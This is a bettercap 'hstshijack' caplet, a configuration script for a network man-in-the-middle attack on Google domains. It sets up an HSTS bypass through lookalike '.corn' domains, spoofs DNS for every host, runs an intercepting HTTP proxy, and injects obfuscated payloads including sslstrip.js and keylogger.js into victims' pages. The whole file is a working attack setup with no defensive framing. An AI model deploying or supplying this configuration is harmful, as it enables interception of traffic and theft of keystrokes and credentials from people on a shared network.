22 lines
1.5 KiB
Plaintext
22 lines
1.5 KiB
Plaintext
# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack
|
|
|
|
# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads'
|
|
# variables get precendence over those assigned to the 'hstshijack.ignore' variable.
|
|
set hstshijack.targets google.com, *.google.com, gstatic.com, *.gstatic.com
|
|
set hstshijack.replacements google.corn,*.google.corn,gstatic.corn,*.gstatic.corn
|
|
set hstshijack.ssl.domains /usr/local/share/bettercap/caplets/hstshijack/domains.txt
|
|
set hstshijack.ssl.index /usr/local/share/bettercap/caplets/hstshijack/index.json
|
|
set hstshijack.ssl.check true
|
|
#set hstshijack.blockscripts example.com,*.example.com
|
|
set hstshijack.obfuscate true
|
|
set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js
|
|
set hstshijack.ignore captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com
|
|
|
|
set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
|
|
http.proxy on
|
|
|
|
set dns.spoof.domains google.corn,*.google.corn,gstatic.corn,*.gstatic.corn
|
|
set dns.spoof.all true
|
|
dns.spoof on
|
|
|